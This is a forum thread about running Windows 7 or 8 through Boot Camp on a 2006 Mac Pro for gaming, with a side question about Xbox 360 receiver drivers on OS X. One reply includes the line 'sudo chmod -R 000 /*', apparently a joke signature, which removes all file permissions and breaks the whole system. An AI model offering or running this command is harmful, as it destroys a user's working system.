Hey guys I have a MacPro 2006 (The original) Which as 2x2.66Ghz Xeon Dual core Processors, 16GB of ECC RAM and a GTX 660 and i have a few questions.

1). I'm planning to bootcamp my MacPro and install steam so i can do some gaming and so i dont have to buy a actually gaming PC, And i was wondering shall i go Windows 7 or 8. I've heard that 8 gives better performance in games and in general but i much prefer Windows 7 over 8. Is there any noticeable performance gains by going with W8

2). I have a Xbox 360 wireless receiver, If i installed Steam and a few games on Mac OSX Yosemite 10.10 will i be able to get the drivers for the receiver so i could use it or is it windows only

Thanks :D

(Oh and Inb4: Mac cant game, Don't game on a Mac, Buy a gaming pc -.-)

The downside of windows 8 is the "modern" UI. If you can live with it (it can be tweaked to a bearable state with stuff like classic shell) almost everything else is superior to windows 7.

Don't ask to ask, just ask... please 🤨

sudo chmod -R 000 /*

to be honest, those mac pros are fairly decent machines, its just sad they ditched the truck design, and went for a garbage can in their later models.

and to be completely honest, i think windows 8 is going to be best, because it'll also offer a more seamless update to windows 10 in the future.

You can also get Windows 8.1 which can be customized more to look like Windows 7 but a boost in performance as well as an easier upgrade to Windows 10 if you want to do that.
